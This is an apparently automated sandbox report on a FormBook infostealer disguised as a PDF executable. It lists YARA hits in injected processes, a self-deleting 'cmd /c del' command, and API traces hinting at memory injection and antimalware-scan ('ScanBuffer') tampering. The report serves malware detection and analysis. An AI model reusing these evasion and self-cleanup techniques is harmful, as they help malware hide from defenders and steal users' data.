Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.460149911.0000000002EE0000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.460149911.0000000002EE0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.460149911.0000000002EE0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.455193853.0000000000AC0000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.455193853.0000000000AC0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.455193853.0000000000AC0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000000.348032682.0000000072480000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000000.348032682.0000000072480000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000000.348032682.0000000072480000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000000.348616604.0000000072480000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000000.348616604.0000000072480000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000000.348616604.0000000072480000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000000.347239632.0000000072480000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000000.347239632.0000000072480000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000000.347239632.0000000072480000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000000.349144544.0000000072480000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000000.349144544.0000000072480000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000000.349144544.0000000072480000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.462816112.0000000072480000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.462816112.0000000072480000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.462816112.0000000072480000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Analysis Process: rundll32.exe PID: 3372 Parent PID: 3352

General

Start time:	16:23:58
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe
Imagebase:	0x160000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.816496652.0000000002E90000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.816496652.0000000002E90000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.816496652.0000000002E90000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.810893268.00000000002E0000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.810893268.00000000002E0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.810893268.00000000002E0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.816582225.0000000004350000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.816582225.0000000004350000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.816582225.0000000004350000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Analysis Process: colorcpl.exe PID: 1008 Parent PID: 3352

General

Start time:	16:23:59
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\colorcpl.exe
Wow64 process (32bit):
Commandline:	C:\Windows\SysWOW64\colorcpl.exe
Imagebase:
File size:	86528 bytes
MD5 hash:	746F3B5E7652EA0766BA10414D317981
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: cmd.exe PID: 5844 Parent PID: 3372

General

Start time:	16:24:03
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Windows\SysWOW64\logagent.exe"
Imagebase:	0xd80000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exe PID: 2940 Parent PID: 5844

General

Start time:	16:24:05
Start date:	01/12/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: WWAHost.exe PID: 1956 Parent PID: 7152

General

Start time:	16:24:11
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\WWAHost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WWAHost.exe
Imagebase:	0x970000
File size:	829856 bytes
MD5 hash:	370C260333EB3149EF4E49C8F64652A0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000002.461388859.0000000003450000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000002.461388859.0000000003450000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000002.461388859.0000000003450000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group

Disassembly

Code Analysis

Analysis Process: DOC209272621615.PDF.exe PID: 5616 Parent PID: 5268 DOC209272621615.PDF.exeCOMMON

Executed Functions

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000105,00400000,00461790), ref: 00405E9C RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00400000,00461790), ref: 00405EBA RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00400000,00461790), ref: 00405ED8 RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405EF6 RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,00405F85,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00405F3F RegQueryValueExA.ADVAPI32(?,004060EC,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,00405F85,?,80000001), ref: 00405F5D RegCloseKey.ADVAPI32(?,00405F8C,00000000,?,?,00000000,00405F85,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00405F7F lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00405F9C GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405FA9 GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00405FAF lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00405FDA lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00406021 LoadLibraryExA.KERNEL32(?,00000000,?,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00406031 lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00406059 LoadLibraryExA.KERNEL32(?,00000000,?,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00406069 lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,?,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 0040608F LoadLibraryExA.KERNEL32(?,00000000,?,00000001,?,00000105,?,00000000,?,00000001,?,00000105,?,00000000,00000003,?), ref: 0040609F

Strings

Software\Borland\Locales , xrefs: 00405EB0, 00405ECE Software\Borland\Delphi\Locales , xrefs: 00405EEC

Memory Dump Source

Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales API String ID: 1759228003-2375825460 Opcode ID: e85b8b5f18f98d11f77dd4a75a6bfc4e909d9d51afbd20e7fd9dae12ec9badaa Instruction ID: 78b8716c1d6b3f78e059c23326c5bad80ecdfc9d22bb9ed19f786db41dfff9de Opcode Fuzzy Hash: e85b8b5f18f98d11f77dd4a75a6bfc4e909d9d51afbd20e7fd9dae12ec9badaa Instruction Fuzzy Hash: 6A516F75A4021D7AFB21D6A48C46FEF7BEC9B04744F4401B7BA04F61C2E67C9E448B69

Uniqueness

Uniqueness Score: -1.00%

Strings

RegisterAutomation , xrefs: 0045645E dF , xrefs: 004566AD vcltest3.dll , xrefs: 0045643D

Memory Dump Source

Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: String ID: RegisterAutomation$vcltest3.dll$dF API String ID: 0-2619585711 Opcode ID: bebbeda00556289de3349cc0c43b19427dd01e6f62d31d66b9211dfcce096cd8 Instruction ID: c862d983367047c7d83d43d7369f119c2f1ed98460a64e58c2bee91e03f6acd7 Opcode Fuzzy Hash: bebbeda00556289de3349cc0c43b19427dd01e6f62d31d66b9211dfcce096cd8 Instruction Fuzzy Hash: D0E18074A00204EFD700DF69C585A5EB7F1AF08315FA681AAEC049B367C739EE49DB09

Uniqueness

Uniqueness Score: -1.00%

APIs

Part of subcall function 0045EBB0: LoadLibraryA.KERNEL32(00000000,00000000,0045EC57), ref: 0045EBF9 Part of subcall function 0045EBB0: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,0045EC57), ref: 0045EC01 Part of subcall function 0045EBB0: GetProcAddress.KERNEL32(738C0000,00000000), ref: 0045EC35 VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,0000001D), ref: 0045EFEB VirtualAlloc.KERNEL32(-00465630,00000010,00001000,00000004,?,?,?,0000001D,0000001D,0000001D,00000000,?,00002000,00000001,0000001D), ref: 0045F0B5 VirtualProtect.KERNEL32(-00465630,00010550,00000000,004666A4,?,0000001D,0000001D,0000001D,0000001D,0000001D,0000001D,0000001D,00000000,?,00002000,00000001), ref: 0045F1AB FreeLibrary.KERNEL32(738C0000,0000001D,0000001D,0000001D,0000001D,0000001D,0000001D,0000001D,0000001D,00000000,?,00002000,00000001,0000001D), ref: 0045F1C8

Strings

ScanBuffer , xrefs: 0045EF66 Msi , xrefs: 0045EF1F

Memory Dump Source

Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocLibrary$AddressFreeHandleLoadModuleProcProtect String ID: Msi$ScanBuffer API String ID: 2006266006-3561555771 Opcode ID: 5ad3b546da17034dca05153c687320dbe9ba89b0f212579352e76a09de489316 Instruction ID: f50dc9b62a688634fe35a12e90ff385b065f388c4a73e1f7ea8b28ac3d343785 Opcode Fuzzy Hash: 5ad3b546da17034dca05153c687320dbe9ba89b0f212579352e76a09de489316 Instruction Fuzzy Hash: 86A17B716902819FE314DF48EC86F3173A8FB45709F21543FFA51DB2A2E6F4A8058E99

Uniqueness

Uniqueness Score: -1.00%

APIs

GetVersion.KERNEL32(00000000,00460656), ref: 004605EA Part of subcall function 004478D4: GetCurrentProcessId.KERNEL32(?,00000000,00447A4C), ref: 004478F5 Part of subcall function 004478D4: GlobalAddAtomA.KERNEL32 ref: 00447928 Part of subcall function 004478D4: GetCurrentThreadId.KERNEL32 ref: 00447943 Part of subcall function 004478D4: GlobalAddAtomA.KERNEL32 ref: 00447979 Part of subcall function 004478D4: RegisterWindowMessageA.USER32(00000000,00000000,?,00000000,?,00000000,00447A4C), ref: 0044798F Part of subcall function 004478D4: GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,00447A4C), ref: 00447A13 Part of subcall function 004478D4: GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00447A24

Strings

4cC , xrefs: 00460604, 0046060E, 00460618, 00460628, 00460638

Memory Dump Source

Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: AtomCurrentGlobal$AddressHandleMessageModuleProcProcessRegisterThreadVersionWindow String ID: 4cC API String ID: 3557136124-2099690512 Opcode ID: a912815bf11363b93ca19f7a7f60a486b9a53906b6aed234051300934d9d5803 Instruction ID: 025689f7684f9bed17e1c02e81f1f2566ccf6c41d45d360a3a3928fa787afd4c Opcode Fuzzy Hash: a912815bf11363b93ca19f7a7f60a486b9a53906b6aed234051300934d9d5803 Instruction Fuzzy Hash: C5F0FF39244241AFD311FF26EC5291B3BA4E789314353857BE84043675DA3DECA1DB9E

Uniqueness

Uniqueness Score: -1.00%

APIs

LoadLibraryA.KERNEL32(02EA8CCC,00466680,00000000,0045EED7), ref: 0045EE31

Memory Dump Source

Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad String ID: API String ID: 1029625771-0 Opcode ID: 97d185083bbda5420dd8d0232ad7df22f33ba54b0d8fe9ee6b458a3115588826 Instruction ID: 41749767bb47e492ca36cbe40e98458e297fbfc91c6430a84583a06b372d5935 Opcode Fuzzy Hash: 97d185083bbda5420dd8d0232ad7df22f33ba54b0d8fe9ee6b458a3115588826 Instruction Fuzzy Hash: D8313AB0A01600EFCB04CF29F882E5677F4EB4A310B12857AE805D7361E379AD05CF5A

Uniqueness

Uniqueness Score: -1.00%

APIs

Part of subcall function 00421724: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 00421742 GetClassInfoA.USER32 ref: 00455993 RegisterClassA.USER32 ref: 004559AB Part of subcall function 00406740: LoadStringA.USER32 ref: 00406772 SetWindowLongA.USER32(0000000E,000000FC,10CC0000), ref: 00455A47 SendMessageA.USER32(0000000E,00000080,00000001,00000000), ref: 00455A69 SetClassLongA.USER32(0000000E,000000F2,00000000,0000000E,00000080,00000001,00000000,0000000E,000000FC,10CC0000,0044C880), ref: 00455A7C GetSystemMenu.USER32(0000000E,00000000,0000000E,000000FC,10CC0000,0044C880), ref: 00455A87 DeleteMenu.USER32(00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10CC0000,0044C880), ref: 00455A96 DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10CC0000,0044C880), ref: 00455AA3 DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10CC0000,0044C880), ref: 00455ABA

Strings

X5B , xrefs: 004559B8 Tn@ , xrefs: 0045597E L0F , xrefs: 0045595D

Memory Dump Source

Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$ClassDelete$Long$AllocInfoLoadMessageRegisterSendStringSystemVirtualWindow String ID: L0F$Tn@$X5B API String ID: 2103932818-3306811505 Opcode ID: 1061d3b833ce9895d9cf07967922cd786b4ec16f4d71d80d9c33e4b0a42dfe87 Instruction ID: 8b2a45e2b46d75add65d1c0541aee3cefa7279e0c305bd2f6c4295ac0c4b2ff4 Opcode Fuzzy Hash: 1061d3b833ce9895d9cf07967922cd786b4ec16f4d71d80d9c33e4b0a42dfe87 Instruction Fuzzy Hash: 62418070600700AFE710EF69DD92F6A3399AB04715F55417AFD00EB2D3EAB9AC448B6D

Uniqueness

Uniqueness Score: -1.00%

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00447A4C), ref: 004478F5 GlobalAddAtomA.KERNEL32 ref: 00447928 GetCurrentThreadId.KERNEL32 ref: 00447943 GlobalAddAtomA.KERNEL32 ref: 00447979 RegisterWindowMessageA.USER32(00000000,00000000,?,00000000,?,00000000,00447A4C), ref: 0044798F Part of subcall function 0041AA24: InitializeCriticalSection.KERNEL32(00418518,?,?,004479A5,00000000,00000000,?,00000000,?,00000000,00447A4C), ref: 0041AA43 Part of subcall function 004474DC: SetErrorMode.KERNEL32(00008000), ref: 004474F5 Part of subcall function 004474DC: GetModuleHandleA.KERNEL32(USER32,00000000,00447642,?,00008000), ref: 00447519 Part of subcall function 004474DC: GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 00447526 Part of subcall function 004474DC: LoadLibraryA.KERNEL32(imm32.dll,00000000,00447642,?,00008000), ref: 00447542 Part of subcall function 004474DC: GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 00447564 Part of subcall function 004474DC: GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 00447579 Part of subcall function 004474DC: GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 0044758E Part of subcall function 004474DC: GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 004475A3 Part of subcall function 004474DC: GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 004475B8 Part of subcall function 004474DC: GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 004475CD Part of subcall function 004474DC: GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 004475E2 Part of subcall function 004474DC: GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 004475F7 Part of subcall function 004474DC: GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 0044760C Part of subcall function 004474DC: GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 00447621 Part of subcall function 004474DC: SetErrorMode.KERNEL32(?,00447649,00008000), ref: 0044763C Part of subcall function 004543D8: GetKeyboardLayout.USER32 ref: 0045441D Part of subcall function 004543D8: GetDC.USER32(00000000), ref: 00454472 Part of subcall function 004543D8: GetDeviceCaps.GDI32(00000000,0000005A), ref: 0045447C Part of subcall function 004543D8: ReleaseDC.USER32 ref: 00454487 Part of subcall function 004555E0: LoadIconA.USER32 ref: 004556D7 Part of subcall function 004555E0: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,004479E4,00000000,00000000,?,00000000,?,00000000,00447A4C), ref: 00455709 Part of subcall function 004555E0: OemToCharA.USER32 ref: 0045571C Part of subcall function 004555E0: CharNextA.USER32(?,?,?,00400000,?,00000100,00400000,MAINICON,?,?,?,004479E4,00000000,00000000,?,00000000), ref: 0045575B Part of subcall function 004555E0: CharLowerA.USER32(00000000,?,?,?,00400000,?,00000100,00400000,MAINICON,?,?,?,004479E4,00000000,00000000,?), ref: 00455761 GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,00447A4C), ref: 00447A13 GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00447A24

Strings

Delphi%.8X , xrefs: 00447906 0sC , xrefs: 004479B1 ControlOfs%.8X%.8X , xrefs: 00447957 USER32 , xrefs: 00447A0E AnimateWindow , xrefs: 00447A1E

Memory Dump Source

Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$CharModule$AtomCurrentErrorGlobalHandleLoadMode$CapsCriticalDeviceFileIconInitializeKeyboardLayoutLibraryLowerMessageNameNextProcessRegisterReleaseSectionThreadWindow String ID: 0sC$AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$USER32 API String ID: 1515865724-1439261924 Opcode ID: 1cab24320c825aae389d2ad9d806f951871264bbd0d0d4677ce10ca45a00fae6 Instruction ID: dcfdd3a89ae3525500325092b6b3c25abddc81a31b1afbe156e43ea57f3249c9 Opcode Fuzzy Hash: 1cab24320c825aae389d2ad9d806f951871264bbd0d0d4677ce10ca45a00fae6 Instruction Fuzzy Hash: 634193B0604205AFD700EFA9ED42A8D77F5EB44308B01457BF401F73A2EB79A9008B5E

Uniqueness

Uniqueness Score: -1.00%

APIs

LoadIconA.USER32 ref: 004556D7 GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,004479E4,00000000,00000000,?,00000000,?,00000000,00447A4C), ref: 00455709 OemToCharA.USER32 ref: 0045571C CharNextA.USER32(?,?,?,00400000,?,00000100,00400000,MAINICON,?,?,?,004479E4,00000000,00000000,?,00000000), ref: 0045575B CharLowerA.USER32(00000000,?,?,?,00400000,?,00000100,00400000,MAINICON,?,?,?,004479E4,00000000,00000000,?), ref: 00455761 Part of subcall function 00455934: GetClassInfoA.USER32 ref: 00455993 Part of subcall function 00455934: RegisterClassA.USER32 ref: 004559AB Part of subcall function 00455934: SetWindowLongA.USER32(0000000E,000000FC,10CC0000), ref: 00455A47 Part of subcall function 00455934: SendMessageA.USER32(0000000E,00000080,00000001,00000000), ref: 00455A69

Strings

00F , xrefs: 004556CF, 00455701 MAINICON , xrefs: 004556CA 80F , xrefs: 00455794

Memory Dump Source

Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Char$Class$FileIconInfoLoadLongLowerMessageModuleNameNextRegisterSendWindow String ID: 00F$80F$MAINICON API String ID: 2763768735-2155582179 Opcode ID: 140bc95ab58d9b9ad052038345c73fd038fbbacc063635515f1d9b8afcd3790a Instruction ID: 3d65150858da70b31048973324385ee2371e73c537065fabeb210eff4a88cc2d Opcode Fuzzy Hash: 140bc95ab58d9b9ad052038345c73fd038fbbacc063635515f1d9b8afcd3790a Instruction Fuzzy Hash: B2516F706042849FDB10EF39D885B867BE4AF15308F4440BAEC48DF397DBB99948CB69

Uniqueness

Uniqueness Score: -1.00%

APIs

GetThreadLocale.KERNEL32(00000000,0040D327,?,?,00000000,00000000), ref: 0040D092 Part of subcall function 0040B954: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040B972

Strings

:mm , xrefs: 0040D2C5 :mm:ss , xrefs: 0040D2E2 mmmm d, yyyy , xrefs: 0040D18E m/d/yy , xrefs: 0040D161 AMPM , xrefs: 0040D2A6 AMPM , xrefs: 0040D2B5

Memory Dump Source

Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Locale$InfoThread String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy API String ID: 4232894706-2493093252 Opcode ID: b5e0a9655523728610d75e5f6b93e2a53b5ce1a3b15ab957e18a3459b3b457b6 Instruction ID: c9001327b6f8c8ca4ed95205664730ab35d4fa54160187d9b8d5148293e8bd77 Opcode Fuzzy Hash: b5e0a9655523728610d75e5f6b93e2a53b5ce1a3b15ab957e18a3459b3b457b6 Instruction Fuzzy Hash: 0D615E70B001499BDB00FBE5D891A9E76A6DB88304F50D43BB601BB7C6DB3CD919879E

Uniqueness

Uniqueness Score: -1.00%

APIs

InetIsOffline.URL(000124F2,00000000,00460B18,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0046089B AuditFree.ADVAPI32(000124F2,00000000,00460B18,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0046090C Part of subcall function 0045EBB0: LoadLibraryA.KERNEL32(00000000,00000000,0045EC57), ref: 0045EBF9 Part of subcall function 0045EBB0: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,0045EC57), ref: 0045EC01 Part of subcall function 0045EBB0: GetProcAddress.KERNEL32(738C0000,00000000), ref: 0045EC35

Strings

ScanString , xrefs: 00460A87 mssip32 , xrefs: 00460928 Msi , xrefs: 004608BA DllRegisterServer , xrefs: 004608DF, 00460923 rrrrrrrtutFrk , xrefs: 004608A9

Memory Dump Source

Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

